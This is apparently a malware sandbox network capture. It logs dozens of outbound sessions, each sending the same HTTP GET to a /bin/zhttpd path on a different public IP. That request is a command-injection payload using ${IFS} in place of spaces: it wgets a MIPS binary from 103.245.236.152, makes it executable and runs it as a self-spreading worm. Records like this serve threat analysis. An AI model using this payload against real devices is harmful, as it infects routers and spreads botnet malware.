                                          Jan 14, 2024 15:46:11.885220051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3260192.168.2.235098098.88.235.242443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.885238886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3261192.168.2.2359802182.95.177.137443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.885238886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3262192.168.2.2338328200.158.115.88443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.885276079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3263192.168.2.2355798124.122.132.8443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.885287046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3264192.168.2.235787280.167.110.129443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.885310888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3265192.168.2.233312692.179.60.48443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.885351896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3266192.168.2.234131282.213.200.44443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.885381937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3267192.168.2.236075050.187.40.108443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.885416031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3268192.168.2.2359572162.207.71.191443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.885436058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3269192.168.2.23571441.221.183.35443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.885478020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3270192.168.2.2349446205.235.83.138443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.885514021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3271192.168.2.235246660.202.245.93443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.885546923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3272192.168.2.23329581.199.38.240443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.885601044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3273192.168.2.2350342122.148.32.188443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.885624886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3274192.168.2.2341810219.181.183.163443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.885647058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3275192.168.2.233531049.78.7.46443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.885682106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3276192.168.2.234688419.87.216.235443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.885711908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3277192.168.2.2345096144.143.14.234443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.885725975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3278192.168.2.2340402144.13.161.22443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.885734081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3279192.168.2.2343846168.97.102.109443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.885767937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3280192.168.2.234576812.179.59.1443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.885806084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3281192.168.2.235844896.67.130.206443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.885849953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3282192.168.2.234830087.23.28.63443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.885863066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3283192.168.2.2333634177.243.154.226443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.885896921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3284192.168.2.233343461.40.55.140443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.885931969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3285192.168.2.233513060.192.175.116443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.885951042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3286192.168.2.233506087.95.210.224443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.885973930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3287192.168.2.2348568143.40.99.177443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.885992050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3288192.168.2.2333622164.151.245.83443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.886010885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3289192.168.2.235830242.208.48.252443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.886048079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3290192.168.2.23356362.130.14.48443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.886110067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3291192.168.2.234563282.205.117.38443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.886109114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3292192.168.2.234296081.218.29.112443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.886136055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3293192.168.2.23457705.26.2.68443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.886140108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3294192.168.2.2354640223.59.150.238443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.886171103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3295192.168.2.2353670217.95.255.114443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.886207104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3296192.168.2.234022685.135.171.17443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.886240959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3297192.168.2.2345110158.150.69.9443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.886241913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3298192.168.2.2342554213.214.103.123443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.886276007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3299192.168.2.233562880.248.244.53443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.886303902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3300192.168.2.233675440.180.102.161443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.886337042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3301192.168.2.233526468.251.103.241443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.886343956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3302192.168.2.234979874.129.104.1443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.886384010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3303192.168.2.2345340187.183.93.137443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.886411905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3304192.168.2.2339680122.132.0.114443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.886444092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3305192.168.2.2360432177.106.109.249443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.886478901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3306192.168.2.2347568220.209.147.71443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.886495113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3307192.168.2.234199474.88.51.18443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.886533976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3308192.168.2.234179087.33.178.213443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.886579990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3309192.168.2.235260258.135.55.33443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.886611938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3310192.168.2.2334212160.19.181.189443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.886636019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3311192.168.2.2333274186.41.145.150443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.886636019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3312192.168.2.2337904207.89.207.207443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.886662006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3313192.168.2.2339332144.79.141.176443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.886671066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3314192.168.2.235760889.213.95.7443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.886710882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3315192.168.2.234993858.194.48.123443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.886729956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3316192.168.2.235173439.77.74.106443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.886766911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3317192.168.2.2343464174.216.2.105443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.886785984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3318192.168.2.234505499.78.205.210443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.886785984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3319192.168.2.234299465.200.213.64443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.886838913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3320192.168.2.233933074.46.104.145443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.886881113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3321192.168.2.235267493.200.234.70443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.886899948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3322192.168.2.2339594158.25.217.164443
                                          TimestampBytes transferredDirectionData
